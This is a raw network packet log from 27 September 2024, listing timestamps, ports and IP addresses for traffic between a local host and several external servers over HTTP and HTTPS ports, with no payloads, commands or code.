Sep 27, 2024 01:49:52.590890884 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:52.592176914 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.592282057 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.592303038 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.067636967 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.067761898 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.068028927 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.077945948 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.077961922 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.078008890 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.078015089 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.094470978 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.094501972 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.098754883 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.103108883 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.103120089 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.207509995 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:53.207588911 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:53.207592010 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.207636118 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.241947889 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.241978884 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:53.299165964 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.303982973 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482276917 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482482910 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482496023 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482508898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482520103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482532024 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482542992 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482562065 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482570887 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482594967 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482599974 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482624054 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482635021 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482637882 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482665062 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482666016 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482676983 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482683897 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482690096 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482702017 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482717037 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482722998 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482729912 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482738018 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482748985 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482753038 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482763052 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482779980 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482788086 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482789993 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482801914 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482806921 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482820034 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482831001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482842922 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482846975 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482855082 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482862949 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482867002 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482878923 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482889891 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482891083 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482907057 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482923985 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482943058 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482944012 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482963085 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482968092 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482976913 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.482986927 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.482989073 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483006001 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483021975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483031988 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483033895 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483046055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483067989 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483072996 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483081102 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483095884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483095884 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483108044 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483120918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483125925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483133078 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483149052 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483150959 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483170033 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483191013 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483192921 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483210087 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483217001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483232021 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483234882 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483242989 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483247995 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483253956 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483278036 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483283997 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483297110 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483305931 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483306885 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483316898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483324051 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483347893 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483357906 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483361959 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483372927 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483395100 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483406067 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483407021 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483413935 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483419895 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483438015 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483453035 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483464003 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483532906 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483545065 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483553886 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.483572006 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.483596087 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.569582939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:53.569731951 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:53.593820095 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.593903065 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.597784996 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.597810030 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.598119974 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.599705935 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.599740982 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:53.599788904 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:53.782596111 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.782636881 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:53.782715082 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.782916069 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:53.782927036 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:54.049854994 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.050121069 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.050192118 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.050421000 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.050443888 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.050460100 CEST	49740	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.050466061 CEST	443	49740	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.069694996 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.069744110 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.069807053 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.070604086 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.070624113 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.404952049 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:54.409792900 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:54.410089970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:54.415189028 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:54.419938087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:54.439660072 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:54.439786911 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:54.440280914 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:54.440287113 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:54.441900015 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:54.441905975 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:54.540813923 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.540910959 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.542442083 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.542469978 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.542753935 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:54.544087887 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.544131994 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:54.544187069 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:55.118140936 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:55.118244886 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:55.118321896 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:55.118441105 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:55.118474007 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:55.118500948 CEST	49742	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:55.118516922 CEST	443	49742	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:55.119569063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119585991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119601011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119611025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119651079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119663954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119674921 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119687080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119699001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119699001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.119699001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.119699001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.119710922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.119846106 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.119846106 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.119847059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.125335932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.125361919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.125376940 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.135710001 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.135737896 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.135942936 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.136291027 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.136305094 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.168942928 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.183763981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.183789968 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.183803082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.183815002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.183828115 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.183840036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.183861017 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.184103012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184158087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184169054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184171915 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.184180021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184226036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.184746981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184804916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184823036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184834957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184848070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.184886932 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.184909105 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.184910059 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.185647964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.185684919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.185694933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.185712099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.185723066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.185823917 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.185823917 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.186574936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.186676979 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.188621998 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.231419086 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.271708965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.271727085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.271742105 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.271780968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276011944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276041985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276052952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276083946 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276083946 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276103973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276211977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276247025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276258945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276290894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276290894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276304960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276316881 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276329041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276340008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.276376009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.276422024 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.277235031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277245998 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277257919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277303934 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277314901 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277379036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.277379990 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.277865887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277877092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277887106 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277916908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277928114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277937889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277941942 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.277941942 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.277949095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.277971029 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.278414965 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.278773069 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278815985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278826952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278862953 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.278875113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278884888 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278896093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278908014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.278917074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.278937101 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.279741049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279767990 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279778957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.279781103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279822111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279833078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279834032 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.279848099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279860020 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.279932022 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.279954910 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.280699015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.325198889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.361485004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.361516953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.361526966 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.361542940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.361588001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.361618996 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.364120960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.364132881 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.364145994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.364178896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.364190102 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.364207983 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.364258051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368453026 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368465900 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368478060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368489027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368499994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368511915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368525028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368536949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368604898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368616104 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368626118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368630886 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368630886 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368630886 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368717909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368717909 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368736029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368746996 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368767023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368794918 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368879080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368890047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368901968 CEST	80	49743	147.45.44.104	192.168.2.8
